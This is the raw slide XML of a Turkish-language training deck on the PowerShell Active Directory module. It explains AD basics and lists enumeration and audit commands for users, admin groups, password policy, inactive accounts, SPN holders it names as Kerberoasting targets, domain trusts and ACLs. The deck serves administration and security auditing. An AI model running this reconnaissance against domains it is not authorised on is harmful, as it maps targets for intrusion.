                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kullanıcıları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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listeler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</a:p>
          <a:p>
            <a:pPr lvl="1"/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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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ADUser</a:t>
            </a:r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-Filter * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Displayname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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>değeri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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>içerisinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gecen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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kullanıcıları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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listeler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</a:p>
          <a:p>
            <a:pPr lvl="1"/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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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ADUser</a:t>
            </a:r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-Filter 'DisplayName -like "*Admin*"'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39843241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9EAA5-C6DA-384E-A8F5-08D6F929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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Active Directory Module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62137-9292-4346-1AF5-599A0C4B9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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tüm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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bilgisayarları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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listeler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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>değerlerini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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filtreler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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CSV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>olarak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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dışarı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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aktarır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</a:p>
          <a:p>
            <a:pPr lvl="1"/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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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ADComputer</a:t>
            </a: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-Filter * | Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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Name,SID</a:t>
            </a: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| Export-Csv -Path computers.csv -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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NoTypeInformation</a:t>
            </a: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  <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Servise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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sahip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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objeleri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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listeler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</a:p>
          <a:p>
            <a:pPr lvl="1"/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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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ADObject</a:t>
            </a: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-Filter '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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serviceprincipalname</a:t>
            </a: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-like "*"' -Properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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serviceprincipalname</a:t>
            </a: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  <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Foresttaki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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tüm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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domainlere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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bağlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sunucularını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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listeler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</a:p>
          <a:p>
            <a:pPr lvl="1"/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(Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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ADForest</a:t>
            </a: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).Domains | % { Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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ADDomainController</a:t>
            </a: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-Filter * -Server $_ } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Domain admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>grubunun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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>üyelerini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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listeler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</a:p>
          <a:p>
            <a:pPr lvl="1"/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Get-ADGroup -Filter 'Name -like "Domain Admins"' -Properties member | select member </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1363216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E2A1D-6B88-9AB0-9B66-FA6303A1F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4318A-0D0B-20AA-AD39-24DE335FA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Active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A10BB-A6B9-5620-AF28-79312FF2C1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Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geliştirilmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yılında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılmaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>başlanmıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kurum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bünyesindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bilgisayarları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkilerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parolaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yönetmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hiyerarşik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>merkezi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altyapıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Objeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (Authentication) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkilendirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (Authorization) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>işlevlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerçekleştirmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Ağaç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapısı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>şeklinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapılandırılmıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mantıksal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objelerle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bölümlere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ayrılmıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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2F7222-4B2D-9801-2B4E-2D795CDBA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543970"/>
            <a:ext cx="5181600" cy="29146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993219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378D2-69C7-C736-CB84-990E4D839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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Active Directory Module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384F8C8-5833-F620-92DE-8A29045E3C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485496"/>
            <a:ext cx="10233314" cy="3031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800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>komutlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>mevcut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>listelemelerinizi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>derinleştirir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty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Belirli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bir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kullanıcının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üye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olduğu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grupları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listeler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Get-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ADPrincipalGroupMembership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-Identity "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kullaniciadi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 | Select-Object name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Domain Admins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grubunun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üyelerini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iç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içe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geçmiş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gruplar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dahil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listeler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Get-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ADGroupMember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-Identity "Domain Admins" -Recursive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Açıklama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(description)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kısmında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"admin", "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yönetici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gibi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ifadeler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geçen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kullanıcıları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bulur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Get-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ADUser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-Filter 'Description -like "*admin*"' -Properties Description | Select-Object Name, Description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Belirli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bir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OU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içerisindeki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tüm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kullanıcıları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listeler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Get-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ADUser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-Filter * -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SearchBase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"OU=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Departman,DC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=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sirket,DC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=local“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6419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354A3-BFC2-9711-71B6-0950DB7EA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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Active Directory Module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205D45F-410D-ADDA-94E7-44AE0BE61F2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677855"/>
            <a:ext cx="11293476" cy="2646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800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>komutlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>genellikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>denetimlerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> ilk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bakılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yerlerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty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Varsayılan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domain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parola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politikasını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gösterir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(min.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uzunluk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karmaşıklık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vb.)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Get-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ADDefaultDomainPasswordPolicy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Parolası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süresiz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olarak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ayarlanmış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PasswordNeverExpires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tüm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hesapları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bulur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güvenlik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zafiyeti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!)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Search-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ADAccount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-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PasswordNeverExpires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| Select-Object Name,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DistinguishedName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Belirli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bir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süredir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örn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90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gün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pasif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olan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kullanıcı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hesaplarını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bulur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Search-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ADAccount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-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AccountInactive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-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TimeSpan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90.00:00:00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Kilitlenmiş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(locked out)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kullanıcı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hesaplarını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listeler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Search-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ADAccount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-LockedOut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3731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A9AE4-89A2-AA7B-AFB7-5B68BFDB4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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Active Directory Module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95CD294-BC29-0581-8DD3-FAF0A291BE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893299"/>
            <a:ext cx="9334607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800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>komutlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>altyapıyı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>potansiyel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>saldırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yüzeylerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>anlamaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yöneliktir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty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Kerberoasting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saldırısı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için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potansiyel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hedefleri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SPN'e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sahip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kullanıcıları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listeler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Get-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ADUser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-Filter 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ServicePrincipalName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-ne "$null"' -Properties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ServicePrincipalName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| select Name,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ServicePrincipalName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Mevcut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domain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ile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güven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ilişkisi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(trust)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kurmuş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diğer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domain'leri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listeler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Get-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ADTrust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-Filter *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Tüm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Group Policy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Object'leri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(GPO)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listeler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Get-GPO -All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(Bu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komut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için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GroupPolicy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modülünün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yüklü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olması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gerekir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Import-Module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GroupPolicy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092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34040-2BA8-63F3-7A21-8C54C044B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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Active Directory Module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B2C5C8C-9C99-2B77-6230-3945E33297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3108742"/>
            <a:ext cx="13794161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800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bölüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kimin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>neye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>olduğunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>anlamak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kritik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>öneme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sahiptir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>genellikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>seviye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konudur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty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Domain Admins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grubunu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kimlerin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değiştirebileceğini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üye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ekleyip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çıkarabileceğini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gösterir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(Get-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Acl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"AD:CN=Domain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Admins,CN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=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Users,DC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=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sirket,DC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=local").Access | Select-Object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IdentityReference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ActiveDirectoryRights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Belirli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bir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kullanıcı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üzerinde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"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GenericAll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 (tam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kontrol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hakkı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olan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hesapları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listeler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DCSync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saldırısı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tespiti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için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önemlidir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Get-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ADUser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"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hedefkullanici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 | Get-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Acl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| Select-Object -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ExpandProperty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Access | Where-Object {($_.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ActiveDirectoryRights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-eq "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GenericAll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") -and ($_.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IdentityReference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-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notlike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"BUILTIN\Administrators")}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870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0F25B-5831-F516-1776-491AF903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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #7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C5D99-E509-D834-B194-A1F090027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Description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>attributunda</a:t>
            </a:r>
            <a:r>
